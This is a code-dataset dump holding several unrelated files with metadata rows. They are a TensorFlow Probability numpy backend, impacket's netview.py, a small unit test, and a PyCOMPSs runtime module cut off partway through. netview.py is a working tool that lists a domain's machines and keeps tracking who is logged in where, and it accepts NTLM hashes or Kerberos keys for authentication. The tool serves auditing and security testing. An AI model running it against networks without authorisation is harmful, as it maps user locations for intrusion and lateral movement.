# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Numpy implementations of TensorFlow general top-level functions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Dependency imports
import numpy as np
import tensorflow as tf
from tensorflow_probability.python.internal.backend.numpy.internal import utils
from tensorflow_probability.python.internal.backend.numpy.linalg import norm
__all__ = [
'concat',
'expand_dims',
'fill',
'gather',
'gather_nd',
'linspace',
'meshgrid',
'norm',
'one_hot',
'ones',
'ones_like',
'pad',
'range',
'rank',
'reshape',
'reverse',
'roll',
'searchsorted',
'shape',
'size',
'slice',
'split',
'squeeze',
'stack',
'tile',
'transpose',
'unstack',
'where',
'zeros',
'zeros_like',
# 'boolean_mask',
# 'einsum',
# 'foldl',
# 'foldr',
# 'tensordot',
]
# TODO(b/256095991): Add unit test.
def _gather( # pylint: disable=unused-argument
params,
indices,
validate_indices=None,
axis=None,
batch_dims=0,
name=None):
"""gather."""
if validate_indices is not None:
raise NotImplementedError(
'Argument `validate_indices != None` is currently unimplemented.')
if batch_dims != 0:
raise NotImplementedError(
'Argument `batch_dims != 0` is currently unimplemented.')
return np.take(params, indices, axis=axis)
def _gather_nd( # pylint: disable=unused-argument
params,
indices,
batch_dims=0,
name=None):
"""gather_nd."""
raise NotImplementedError
def _one_hot( # pylint: disable=unused-argument
indices,
depth,
on_value=None,
off_value=None,
axis=None,
dtype=None,
name=None):
"""One hot."""
if on_value is None:
on_value = 1
if off_value is None:
off_value = 0
if axis is None:
axis = -1
zeros = np.zeros_like(indices) # pylint: disable=redefined-outer-name
zeros = np.tile(zeros[..., None], [1] * len(indices.shape) + [depth])
ones = np.ones_like(zeros) # pylint: disable=redefined-outer-name
cond = np.abs(np.arange(depth, dtype=np.float32)[None] + zeros
- indices[..., None] + zeros) < 0.1
y_out = np.where(cond, ones * on_value, zeros + off_value)
if axis is not None:
y_out = np.swapaxes(y_out, axis, -1)
return y_out
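# Editor's note: the matching in `_one_hot` relies on broadcasting
# np.arange(depth) against indices[..., None] and treating |difference| < 0.1
# as equality. The tiny helper below is an illustrative sketch added here, not
# part of the original backend, and nothing calls it.
def _one_hot_demo():
  """Standalone demo of the arange-vs-indices comparison trick."""
  indices = np.array([0, 2, 1])
  depth = 3
  cond = np.abs(np.arange(depth)[None, :] - indices[:, None]) < 0.1
  # cond.astype(np.float32) ->
  # [[1., 0., 0.],
  #  [0., 0., 1.],
  #  [0., 1., 0.]]
  return cond.astype(np.float32)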
def _ones_like(input, dtype=None, name=None): # pylint: disable=redefined-builtin
s = _shape(input)
if isinstance(s, (np.ndarray, np.generic)):
return np.ones(s, utils.numpy_dtype(dtype or input.dtype))
return tf.ones(s, dtype or s.dtype, name)
# TODO(b/136555907): Add unit-test.
def _pad( # pylint: disable=unused-argument
tensor,
paddings,
mode='CONSTANT',
name=None,
constant_values=0):
return np.pad(
tensor, paddings,
mode=mode.lower(),
constant_values=constant_values)
def _reverse(tensor, axis, name=None): # pylint: disable=unused-argument
if np.array(axis).ndim == 0:
return np.flip(tensor, axis)
for ax in axis:
tensor = np.flip(tensor, ax)
return tensor
def _searchsorted( # pylint: disable=unused-argument
sorted_sequence,
values,
side='left',
out_type=tf.int32,
name=None):
return np.searchsorted(
sorted_sequence, values, side=side, sorter=None).astype(out_type)
def _shape(input, out_type=tf.int32, name=None): # pylint: disable=redefined-builtin,unused-argument
return np.array(np.array(input).shape).astype(utils.numpy_dtype(out_type))
def _size(input, out_type=tf.int32, name=None): # pylint: disable=redefined-builtin, unused-argument
return np.prod(np.array(input).shape).astype(utils.numpy_dtype(out_type))
builtin_slice = slice # pylint: disable=invalid-name
def _slice(input_, begin, size, name=None): # pylint: disable=unused-argument,redefined-outer-name
slices = tuple(
builtin_slice(b, b + s if s != -1 else -1) for b, s in zip(begin, size))
return input_[slices]
def _split(value, num_or_size_splits, axis=0, num=None, name='split'): # pylint: disable=unused-argument
"""Map tf.split -> np.split."""
indices_or_sections = num_or_size_splits
if np.array(indices_or_sections).ndim == 1:
if any(idx == -1 for idx in indices_or_sections):
# Numpy parameterizes by split indices and returns nsplits+1 arrays.
total_splits = sum(idx for idx in indices_or_sections if idx != -1)
remainder = max(0, np.array(value).shape[axis] - total_splits)
indices_or_sections = [
idx if idx != -1 else remainder for idx in indices_or_sections
]
indices_or_sections = np.cumsum(indices_or_sections)[:-1]
return np.split(value, indices_or_sections, axis)
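# Editor's note: a small sketch of how a `-1` entry in `num_or_size_splits` is
# resolved by `_split` above. This demo function is illustrative only and is
# not part of the original module; nothing calls it.
def _split_demo():
  """Turn tf-style sizes [2, -1, 3] into np.split indices for a length-10 array."""
  value = np.arange(10)
  sizes = [2, -1, 3]  # -1 absorbs the remaining 5 elements
  total = sum(s for s in sizes if s != -1)
  sizes = [s if s != -1 else max(0, value.shape[0] - total) for s in sizes]
  indices = np.cumsum(sizes)[:-1]  # -> array([2, 7]), the split points
  return np.split(value, indices, axis=0)  # pieces of length 2, 5 and 3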
def _transpose(a, perm=None, conjugate=False, name='transpose'): # pylint: disable=unused-argument
x = np.transpose(a, perm)
return np.conjugate(x) if conjugate else x
def _zeros_like(input, dtype=None, name=None): # pylint: disable=redefined-builtin
s = _shape(input)
if isinstance(s, (np.ndarray, np.generic)):
return np.zeros(s, utils.numpy_dtype(dtype or input.dtype))
return tf.zeros(s, dtype or s.dtype, name)
# --- Begin Public Functions --------------------------------------------------
concat = utils.copy_docstring(
tf.concat,
lambda values, axis, name='concat': np.concatenate(values, axis))
expand_dims = utils.copy_docstring(
tf.expand_dims,
lambda input, axis, name=None: np.expand_dims(input, axis))
fill = utils.copy_docstring(
tf.fill,
lambda dims, value, name=None: value * np.ones(dims, np.array(value).dtype))
gather = utils.copy_docstring(
tf.gather,
_gather)
gather_nd = utils.copy_docstring(
tf.gather_nd,
_gather_nd)
reverse = utils.copy_docstring(tf.reverse, _reverse)
linspace = utils.copy_docstring(
tf.linspace,
lambda start, stop, num, name=None: ( # pylint: disable=g-long-lambda
np.linspace(start, stop, num).astype(np.array(start).dtype)))
meshgrid = utils.copy_docstring(
tf.meshgrid,
np.meshgrid)
norm = utils.copy_docstring(
tf.norm,
norm)
one_hot = utils.copy_docstring(
tf.one_hot,
_one_hot)
ones = utils.copy_docstring(
tf.ones,
lambda shape, dtype=tf.float32, name=None: np.ones( # pylint: disable=g-long-lambda
shape, utils.numpy_dtype(dtype)))
ones_like = utils.copy_docstring(
tf.ones_like,
_ones_like)
pad = utils.copy_docstring(
tf.pad,
_pad)
range = utils.copy_docstring( # pylint: disable=redefined-builtin
tf.range,
lambda start, limit=None, delta=1, dtype=None, name='range': ( # pylint: disable=g-long-lambda
np.arange(start, limit, delta, utils.numpy_dtype(dtype))))
rank = utils.copy_docstring(
tf.rank,
lambda input, name=None: len(np.array(input).shape)) # pylint: disable=redefined-builtin,g-long-lambda
reshape = utils.copy_docstring(
tf.reshape,
lambda tensor, shape, name=None: np.reshape(tensor, shape))
roll = utils.copy_docstring(
tf.roll,
lambda input, shift, axis: np.roll(input, shift, axis)) # pylint: disable=unnecessary-lambda
searchsorted = utils.copy_docstring(
tf.searchsorted,
_searchsorted)
shape = utils.copy_docstring(
tf.shape,
_shape)
size = utils.copy_docstring(
tf.size,
_size)
slice = utils.copy_docstring( # pylint: disable=redefined-builtin
tf.slice, _slice)
split = utils.copy_docstring(tf.split, _split)
squeeze = utils.copy_docstring(
tf.squeeze,
lambda input, axis=None, name=None: np.squeeze(input, axis))
stack = utils.copy_docstring(
tf.stack, lambda values, axis=0, name=None: np.stack(values, axis))
tile = utils.copy_docstring(
tf.tile,
lambda input, multiples, name=None: np.tile(input, multiples))
transpose = utils.copy_docstring(
tf.transpose,
_transpose)
unstack = utils.copy_docstring(
tf.unstack,
lambda value, num=None, axis=0, name=None: np.split(value, num, axis))
where = utils.copy_docstring(
tf.compat.v1.where,
lambda condition, x=None, y=None, name=None: np.where(condition, x, y))
zeros = utils.copy_docstring(
tf.zeros,
lambda shape, dtype=tf.float32, name=None: np.zeros( # pylint: disable=g-long-lambda
shape, utils.numpy_dtype(dtype)))
zeros_like = utils.copy_docstring(
tf.zeros_like,
_zeros_like)
| 27.336364
| 107
| 0.676533
|
adb3bc21dd6f84871a2daba6754f08f0f7f73fcf
| 21,876
|
py
|
Python
|
examples/netview.py
|
grkoll/impacket
|
90a91045139659d83409af1771dcaf697c00de99
|
[
"Apache-1.1"
] | null | null | null |
examples/netview.py
|
grkoll/impacket
|
90a91045139659d83409af1771dcaf697c00de99
|
[
"Apache-1.1"
] | null | null | null |
examples/netview.py
|
grkoll/impacket
|
90a91045139659d83409af1771dcaf697c00de99
|
[
"Apache-1.1"
] | null | null | null |
#!/usr/bin/python
# Copyright (c) 2003-2016 CORE Security Technologies
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Author:
# beto (@agsolino)
#
# Description:
# The idea of this script is to get a list of the sessions
# opened at the remote hosts and keep track of them.
# Coincidentally @mubix did something similar a few years
# ago so credit goes to him (and the script's name ;)).
# Check it out at https://github.com/mubix/netview
# The main difference with our approach is we keep
# looping over the hosts found and keep track of who logged
# in/out from remote servers. Plus, we keep the connections
# with the target systems and just send a few DCE-RPC packets.
#
# One VERY IMPORTANT thing is:
#
#   YOU HAVE TO BE ABLE TO RESOLVE THE DOMAIN MACHINES' NETBIOS
# NAMES. That's usually solved by setting your DNS to the
# domain DNS (and the right search domain).
#
# Some examples of usage are:
#
# netview.py -target 192.168.1.10 beto
#
# This will show the sessions on 192.168.1.10 and will authenticate as 'beto'
# (password will be prompted)
#
# netview.py FREEFLY.NET/beto
#
# This will download all machines from FREEFLY.NET, authenticated as 'beto'
# and will gather the session information for those machines that appear
# to be up. There is a background thread checking aliveness of the targets
# at all times.
#
# netview.py -users /tmp/users -dc-ip freefly-dc.freefly.net -k FREEFLY.NET/beto
#
# This will download all machines from FREEFLY.NET, authenticating using
# Kerberos (that's why -dc-ip parameter is needed), and filter
# the output based on the list of users specified in /tmp/users file.
#
#
import sys
import argparse
import logging
import socket
from threading import Thread, Event
from Queue import Queue
from time import sleep
from impacket.examples import logger
from impacket import version
from impacket.smbconnection import SessionError
from impacket.dcerpc.v5 import transport, wkst, srvs, samr
from impacket.dcerpc.v5.ndr import NULL
from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.nt_errors import STATUS_MORE_ENTRIES
machinesAliveQueue = Queue()
machinesDownQueue = Queue()
myIP = None
def checkMachines(machines, stopEvent, singlePass=False):
origLen = len(machines)
deadMachines = machines
done = False
while not done:
if stopEvent.is_set():
done = True
break
for machine in deadMachines:
s = socket.socket()
try:
s = socket.create_connection((machine, 445), 2)
global myIP
myIP = s.getsockname()[0]
s.close()
machinesAliveQueue.put(machine)
except Exception, e:
logging.debug('%s: not alive (%s)' % (machine, e))
pass
else:
logging.debug('%s: alive!' % machine)
deadMachines.remove(machine)
if stopEvent.is_set():
done = True
break
logging.debug('up: %d, down: %d, total: %d' % (origLen-len(deadMachines), len(deadMachines), origLen))
if singlePass is True:
done = True
if not done:
sleep(10)
# Do we have some new deadMachines to add?
while machinesDownQueue.empty() is False:
deadMachines.append(machinesDownQueue.get())
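# Editor's note: the aliveness probe in checkMachines() boils down to attempting
# a TCP connection to port 445 with a short timeout. The helper below is a
# minimal standalone version of that idea, added for illustration; it is not
# part of the original script and nothing calls it.
def isPortOpen(host, port=445, timeout=2):
    """Return True if a TCP connection to host:port succeeds within timeout."""
    try:
        s = socket.create_connection((host, port), timeout)
        s.close()
        return True
    except socket.error:
        return False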
class USERENUM:
def __init__(self, username='', password='', domain='', hashes=None, aesKey=None, doKerberos=False, options=None):
self.__username = username
self.__password = password
self.__domain = domain
self.__lmhash = ''
self.__nthash = ''
self.__aesKey = aesKey
self.__doKerberos = doKerberos
self.__kdcHost = options.dc_ip
self.__options = options
self.__machinesList = list()
self.__targets = dict()
self.__filterUsers = None
self.__targetsThreadEvent = None
self.__targetsThread = None
self.__maxConnections = int(options.max_connections)
if hashes is not None:
self.__lmhash, self.__nthash = hashes.split(':')
def getDomainMachines(self):
if self.__kdcHost is not None:
domainController = self.__kdcHost
        elif self.__domain != '':
domainController = self.__domain
else:
raise Exception('A domain is needed!')
logging.info('Getting machine\'s list from %s' % domainController)
rpctransport = transport.SMBTransport(domainController, 445, r'\samr', self.__username, self.__password,
self.__domain, self.__lmhash, self.__nthash, self.__aesKey,
doKerberos=self.__doKerberos, kdcHost = self.__kdcHost)
dce = rpctransport.get_dce_rpc()
dce.connect()
dce.bind(samr.MSRPC_UUID_SAMR)
try:
resp = samr.hSamrConnect(dce)
serverHandle = resp['ServerHandle']
resp = samr.hSamrEnumerateDomainsInSamServer(dce, serverHandle)
domains = resp['Buffer']['Buffer']
logging.info("Looking up users in domain %s" % domains[0]['Name'])
resp = samr.hSamrLookupDomainInSamServer(dce, serverHandle,domains[0]['Name'] )
resp = samr.hSamrOpenDomain(dce, serverHandle = serverHandle, domainId = resp['DomainId'])
domainHandle = resp['DomainHandle']
status = STATUS_MORE_ENTRIES
enumerationContext = 0
while status == STATUS_MORE_ENTRIES:
try:
resp = samr.hSamrEnumerateUsersInDomain(dce, domainHandle, samr.USER_WORKSTATION_TRUST_ACCOUNT,
enumerationContext=enumerationContext)
except DCERPCException, e:
if str(e).find('STATUS_MORE_ENTRIES') < 0:
raise
resp = e.get_packet()
for user in resp['Buffer']['Buffer']:
self.__machinesList.append(user['Name'][:-1])
logging.debug('Machine name - rid: %s - %d'% (user['Name'], user['RelativeId']))
enumerationContext = resp['EnumerationContext']
status = resp['ErrorCode']
except Exception, e:
raise e
dce.disconnect()
def getTargets(self):
logging.info('Importing targets')
if self.__options.target is None and self.__options.targets is None:
# We need to download the list of machines from the domain
self.getDomainMachines()
elif self.__options.targets is not None:
for line in self.__options.targets.readlines():
self.__machinesList.append(line.strip(' \r\n'))
else:
# Just a single machine
self.__machinesList.append(self.__options.target)
logging.info("Got %d machines" % len(self.__machinesList))
def filterUsers(self):
if self.__options.user is not None:
self.__filterUsers = list()
self.__filterUsers.append(self.__options.user)
elif self.__options.users is not None:
# Grab users list from a file
self.__filterUsers = list()
for line in self.__options.users.readlines():
self.__filterUsers.append(line.strip(' \r\n'))
else:
self.__filterUsers = None
def run(self):
self.getTargets()
self.filterUsers()
#self.filterGroups()
# Up to here we should have figured out the scope of our work
self.__targetsThreadEvent = Event()
if self.__options.noloop is False:
# Start a separate thread checking the targets that are up
self.__targetsThread = Thread(target=checkMachines, args=(self.__machinesList,self.__targetsThreadEvent))
self.__targetsThread.start()
else:
            # Since it's going to be a one-shot test, we need to wait till it finishes
checkMachines(self.__machinesList,self.__targetsThreadEvent, singlePass=True)
while True:
# Do we have more machines to add?
while machinesAliveQueue.empty() is False:
machine = machinesAliveQueue.get()
logging.debug('Adding %s to the up list' % machine)
self.__targets[machine] = {}
self.__targets[machine]['SRVS'] = None
self.__targets[machine]['WKST'] = None
self.__targets[machine]['Admin'] = True
self.__targets[machine]['Sessions'] = list()
self.__targets[machine]['LoggedIn'] = set()
for target in self.__targets.keys():
try:
self.getSessions(target)
self.getLoggedIn(target)
except (SessionError, DCERPCException), e:
# We will silently pass these ones, might be issues with Kerberos, or DCE
if str(e).find('LOGON_FAILURE') >=0:
# For some reason our credentials don't work there,
# taking it out from the list.
logging.error('STATUS_LOGON_FAILURE for %s, discarding' % target)
del(self.__targets[target])
elif str(e).find('INVALID_PARAMETER') >=0:
del(self.__targets[target])
elif str(e).find('access_denied') >=0:
# Can't access the target RPC call, most probably a Unix host
# taking it out from the list
del(self.__targets[target])
else:
logging.info(str(e))
pass
except KeyboardInterrupt:
raise
except Exception, e:
#import traceback
#print traceback.print_exc()
if str(e).find('timed out') >=0:
# Most probably this site went down. taking it out
# ToDo: add it back to the list of machines to check in
# the separate thread - DONE
del(self.__targets[target])
machinesDownQueue.put(target)
else:
# These ones we will report
logging.error(e)
pass
if self.__options.noloop is True:
break
logging.debug('Sleeping for %s seconds' % self.__options.delay)
logging.debug('Currently monitoring %d active targets' % len(self.__targets))
sleep(int(self.__options.delay))
def getSessions(self, target):
if self.__targets[target]['SRVS'] is None:
stringSrvsBinding = r'ncacn_np:%s[\PIPE\srvsvc]' % target
rpctransportSrvs = transport.DCERPCTransportFactory(stringSrvsBinding)
if hasattr(rpctransportSrvs, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransportSrvs.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash,
self.__nthash, self.__aesKey)
rpctransportSrvs.set_kerberos(self.__doKerberos, self.__kdcHost)
dce = rpctransportSrvs.get_dce_rpc()
dce.connect()
dce.bind(srvs.MSRPC_UUID_SRVS)
self.__maxConnections -= 1
else:
dce = self.__targets[target]['SRVS']
try:
resp = srvs.hNetrSessionEnum(dce, '\x00', NULL, 10)
except Exception, e:
if str(e).find('Broken pipe') >= 0:
# The connection timed-out. Let's try to bring it back next round
self.__targets[target]['SRVS'] = None
self.__maxConnections += 1
return
else:
raise
if self.__maxConnections < 0:
# Can't keep this connection open. Closing it
dce.disconnect()
self.__maxConnections = 0
else:
self.__targets[target]['SRVS'] = dce
        # Let's see who created a connection since the last check
tmpSession = list()
printCRLF = False
for session in resp['InfoStruct']['SessionInfo']['Level10']['Buffer']:
userName = session['sesi10_username'][:-1]
sourceIP = session['sesi10_cname'][:-1][2:]
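            # each session is tracked as a 'user\x01sourceIP' string ('\x01' is just an unlikely
            # separator byte); it is split back apart with session.split('\x01') further down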
key = '%s\x01%s' % (userName, sourceIP)
myEntry = '%s\x01%s' % (self.__username, myIP)
tmpSession.append(key)
if not(key in self.__targets[target]['Sessions']):
# Skipping myself
if key != myEntry:
self.__targets[target]['Sessions'].append(key)
# Are we filtering users?
if self.__filterUsers is not None:
if userName in self.__filterUsers:
print "%s: user %s logged from host %s - active: %d, idle: %d" % (
target, userName, sourceIP, session['sesi10_time'], session['sesi10_idle_time'])
printCRLF = True
else:
print "%s: user %s logged from host %s - active: %d, idle: %d" % (
target, userName, sourceIP, session['sesi10_time'], session['sesi10_idle_time'])
printCRLF = True
# Let's see who deleted a connection since last check
for nItem, session in enumerate(self.__targets[target]['Sessions']):
userName, sourceIP = session.split('\x01')
if session not in tmpSession:
del(self.__targets[target]['Sessions'][nItem])
# Are we filtering users?
if self.__filterUsers is not None:
if userName in self.__filterUsers:
print "%s: user %s logged off from host %s" % (target, userName, sourceIP)
printCRLF=True
else:
print "%s: user %s logged off from host %s" % (target, userName, sourceIP)
printCRLF=True
if printCRLF is True:
print
def getLoggedIn(self, target):
if self.__targets[target]['Admin'] is False:
return
if self.__targets[target]['WKST'] is None:
stringWkstBinding = r'ncacn_np:%s[\PIPE\wkssvc]' % target
rpctransportWkst = transport.DCERPCTransportFactory(stringWkstBinding)
if hasattr(rpctransportWkst, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransportWkst.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash,
self.__nthash, self.__aesKey)
rpctransportWkst.set_kerberos(self.__doKerberos, self.__kdcHost)
dce = rpctransportWkst.get_dce_rpc()
dce.connect()
dce.bind(wkst.MSRPC_UUID_WKST)
self.__maxConnections -= 1
else:
dce = self.__targets[target]['WKST']
try:
resp = wkst.hNetrWkstaUserEnum(dce,1)
except Exception, e:
if str(e).find('Broken pipe') >= 0:
# The connection timed-out. Let's try to bring it back next round
self.__targets[target]['WKST'] = None
self.__maxConnections += 1
return
            elif str(e).upper().find('ACCESS_DENIED') >= 0:
# We're not admin, bye
dce.disconnect()
self.__maxConnections += 1
self.__targets[target]['Admin'] = False
return
else:
raise
if self.__maxConnections < 0:
# Can't keep this connection open. Closing it
dce.disconnect()
self.__maxConnections = 0
else:
self.__targets[target]['WKST'] = dce
        # Let's see who logged in locally since the last check
tmpLoggedUsers = set()
printCRLF = False
for session in resp['UserInfo']['WkstaUserInfo']['Level1']['Buffer']:
userName = session['wkui1_username'][:-1]
logonDomain = session['wkui1_logon_domain'][:-1]
key = '%s\x01%s' % (userName, logonDomain)
tmpLoggedUsers.add(key)
if not(key in self.__targets[target]['LoggedIn']):
self.__targets[target]['LoggedIn'].add(key)
# Are we filtering users?
if self.__filterUsers is not None:
if userName in self.__filterUsers:
print "%s: user %s\\%s logged in LOCALLY" % (target,logonDomain,userName)
printCRLF=True
else:
print "%s: user %s\\%s logged in LOCALLY" % (target,logonDomain,userName)
printCRLF=True
# Let's see who logged out since last check
for session in self.__targets[target]['LoggedIn'].copy():
userName, logonDomain = session.split('\x01')
if session not in tmpLoggedUsers:
self.__targets[target]['LoggedIn'].remove(session)
# Are we filtering users?
if self.__filterUsers is not None:
if userName in self.__filterUsers:
print "%s: user %s\\%s logged off LOCALLY" % (target,logonDomain,userName)
printCRLF=True
else:
print "%s: user %s\\%s logged off LOCALLY" % (target,logonDomain,userName)
printCRLF=True
if printCRLF is True:
print
def stop(self):
if self.__targetsThreadEvent is not None:
self.__targetsThreadEvent.set()
# Process command-line arguments.
if __name__ == '__main__':
print version.BANNER
# Init the example's logger theme
logger.init()
parser = argparse.ArgumentParser()
parser.add_argument('identity', action='store', help='[domain/]username[:password]')
parser.add_argument('-user', action='store', help='Filter output by this user')
    parser.add_argument('-users', type=argparse.FileType('r'), help='input file with a list of users to filter the output for')
#parser.add_argument('-group', action='store', help='Filter output by members of this group')
#parser.add_argument('-groups', type=argparse.FileType('r'), help='Filter output by members of the groups included in the input file')
    parser.add_argument('-target', action='store', help='target system to query info from. If not specified, the script will run in domain mode.')
    parser.add_argument('-targets', type=argparse.FileType('r'), help='input file with target systems to query info from (one per line). If not specified, the script will run in domain mode.')
parser.add_argument('-noloop', action='store_true', default=False, help='Stop after the first probe')
parser.add_argument('-delay', action='store', default = '10', help='seconds delay between starting each batch probe (default 10 seconds)')
parser.add_argument('-max-connections', action='store', default='1000', help='Max amount of connections to keep opened (default 1000)')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
group = parser.add_argument_group('authentication')
group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line')
group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication (128 or 256 bits)')
    group.add_argument('-dc-ip', action='store', metavar="ip address", help='IP Address of the domain controller. If omitted, it will use the domain part (FQDN) specified in the target parameter')
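    # Example invocation (illustrative values only; the file name is whatever this script is saved as):
    #   <script>.py contoso.local/jdoe:Passw0rd -users interesting_users.txt -dc-ip 10.0.0.5 -delay 30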
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
options = parser.parse_args()
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
else:
logging.getLogger().setLevel(logging.INFO)
import re
domain, username, password = re.compile('(?:(?:([^/:]*)/)?([^:]*)(?::([^@]*))?)?').match(options.identity).groups(
'')
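    # e.g. 'contoso/jdoe:Secret1' -> ('contoso', 'jdoe', 'Secret1'); a bare 'jdoe' -> ('', 'jdoe', '')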
try:
if domain is None:
domain = ''
if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:
from getpass import getpass
password = getpass("Password:")
if options.aesKey is not None:
options.k = True
executer = USERENUM(username, password, domain, options.hashes, options.aesKey, options.k, options)
executer.run()
except Exception, e:
#import traceback
#print traceback.print_exc()
logging.error(e)
executer.stop()
except KeyboardInterrupt:
logging.info('Quitting.. please wait')
executer.stop()
sys.exit(0)
| 43.927711
| 251
| 0.58507
|
dfdd83407c31a6bf12b76400d0a219c59b0c63b8
| 532
|
py
|
Python
|
edge_case_finder/tests/test_checker/test_checker.py
|
KaustubhDamania/TC-Generator-Checker
|
268b9a99754d4f8d7df94829a3345444cbe11672
|
[
"MIT"
] | 1
|
2020-11-03T17:07:14.000Z
|
2020-11-03T17:07:14.000Z
|
edge_case_finder/tests/test_checker/test_checker.py
|
KaustubhDamania/TC-Generator-Checker
|
268b9a99754d4f8d7df94829a3345444cbe11672
|
[
"MIT"
] | 1
|
2020-10-31T08:09:06.000Z
|
2020-10-31T08:09:06.000Z
|
edge_case_finder/tests/test_checker/test_checker.py
|
KaustubhDamania/TC-Generator-Checker
|
268b9a99754d4f8d7df94829a3345444cbe11672
|
[
"MIT"
] | null | null | null |
from checker import Checker
from .input_fn import *
import unittest
import os
class SimpleTest(unittest.TestCase):
def test1(self):
os.chdir('tests/test_checker')
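        # note: this chdir persists for the whole test run; the relative paths used in
        # test2 below rely on it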
checker = Checker('./test1_correct.out', 'python3 test1_soln.py', input_fn1)
self.assertTrue(checker.check_randomised(100))
def test2(self):
checker = Checker('./test2_correct.out', './test2_soln.out', input_fn2)
self.assertFalse(checker.check_randomised(100))
if __name__ == '__main__':
unittest.main()
| 26.6
| 84
| 0.684211
|
8fc3cfb1e42015e01d555535bf1fdd6d7d802147
| 13,311
|
py
|
Python
|
compss/programming_model/bindings/python/src/pycompss/runtime/management/COMPSs.py
|
eflows4hpc/compss
|
c497f6d34722103c6c8f83ebc314b495573ce054
|
[
"Apache-2.0"
] | null | null | null |
compss/programming_model/bindings/python/src/pycompss/runtime/management/COMPSs.py
|
eflows4hpc/compss
|
c497f6d34722103c6c8f83ebc314b495573ce054
|
[
"Apache-2.0"
] | null | null | null |
compss/programming_model/bindings/python/src/pycompss/runtime/management/COMPSs.py
|
eflows4hpc/compss
|
c497f6d34722103c6c8f83ebc314b495573ce054
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
#
# Copyright 2002-2021 Barcelona Supercomputing Center (www.bsc.es)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -*- coding: utf-8 -*-
"""
PyCOMPSs Binding - Management - Runtime
=======================================
This file contains the COMPSs runtime connection.
Loads the external C module.
"""
from pycompss.util.typing_helper import typing
from pycompss.runtime.management.link import establish_interactive_link
from pycompss.runtime.management.link import establish_link
from pycompss.util.exceptions import PyCOMPSsException
if __debug__:
import logging
logger = logging.getLogger(__name__)
# C module extension for the communication with the runtime
# See ext/compssmodule.cc
# Keep the COMPSs runtime link in this module so that any module can access
# it through the module methods.
_COMPSs = None # type: typing.Any
# Files where the std may be redirected with interactive
_STDOUT = ""
_STDERR = ""
######################################################
# INTERNAL FUNCTIONS #
######################################################
def load_runtime(external_process: bool = False, _logger: typing.Any = None) -> None:
"""Loads the external C extension module.
:param external_process: Loads the runtime in an external process if true.
Within this python process if false.
:param _logger: Use this logger instead of the module logger.
:return: None
"""
global _COMPSs
global _STDOUT
global _STDERR
if external_process:
# For interactive python environments
_COMPSs, _STDOUT, _STDERR = establish_interactive_link(_logger, True)
else:
# Normal python environments
_COMPSs = establish_link(_logger)
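# Typical calls (sketch, following the docstring above; "logger" stands for any logging.Logger):
#   load_runtime(external_process=True, _logger=logger)   # interactive sessions (e.g. notebooks)
#   load_runtime(external_process=False, _logger=logger)  # regular, non-interactive execution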
def is_redirected() -> bool:
"""Check if the stdout and stderr are being redirected.
:return: If stdout/stderr are being redirected.
"""
if _STDOUT == "" and _STDERR == "":
return False
elif _STDOUT != "" and _STDERR != "":
return True
else:
raise PyCOMPSsException("Inconsistent status of _STDOUT and _STDERR")
def get_redirection_file_names() -> typing.Tuple[str, str]:
"""Retrieves the stdout and stderr file names.
:return: The stdout and stderr file names.
"""
if is_redirected():
return _STDOUT, _STDERR
else:
message = "The runtime stdout and stderr are not being redirected."
raise PyCOMPSsException(message)
######################################################
# COMPSs API EXPOSED FUNCTIONS #
######################################################
def start_runtime() -> None:
"""Call to start_runtime.
:return: None
"""
_COMPSs.start_runtime() # noqa
def set_debug(mode: bool) -> None:
"""Call to set_debug.
:param mode: Debug mode
:return: None
"""
_COMPSs.set_debug(mode) # noqa
def stop_runtime(code: int) -> None:
"""Call to stop_runtime.
:param code: Code
:return: None
"""
_COMPSs.stop_runtime(code) # noqa
def cancel_application_tasks(app_id: int, value: int) -> None:
"""Call to cancel_application_tasks.
:param app_id: Application identifier.
:param value: Value
:return: None
"""
_COMPSs.cancel_application_tasks(app_id, value) # noqa
def accessed_file(app_id: int, file_name: str) -> bool:
"""Call to accessed_file.
:param app_id: Application identifier.
:param file_name: File name.
:return: If the file has been accessed.
"""
return _COMPSs.accessed_file(app_id, file_name) # noqa
def open_file(app_id: int, file_name: str, mode: int) -> str:
"""Call to open_file.
:param app_id: Application identifier.
:param file_name: File name reference.
:param mode: Open mode.
:return: The real file name.
"""
return _COMPSs.open_file(app_id, file_name, mode) # noqa
def close_file(app_id: int, file_name: str, mode: int) -> None:
"""Call to close_file.
:param app_id: Application identifier.
:param file_name: File name reference.
:param mode: Close mode.
:return: None
"""
_COMPSs.close_file(app_id, file_name, mode) # noqa
def delete_file(app_id: int, file_name: str, mode: bool) -> bool:
"""Call to delete_file.
:param app_id: Application identifier.
:param file_name: File name reference.
:param mode: Delete mode.
:return: The deletion result.
"""
result = _COMPSs.delete_file(app_id, file_name, mode) # noqa
if result is None:
return False
else:
return result
def get_file(app_id: int, file_name: str) -> None:
"""Call to get_file.
:param app_id: Application identifier.
:param file_name: File name.
:return: None
"""
_COMPSs.get_file(app_id, file_name) # noqa
def get_directory(app_id: int, file_name: str) -> None:
"""Call to get_directory.
:param app_id: Application identifier.
:param file_name: File name.
:return: None
"""
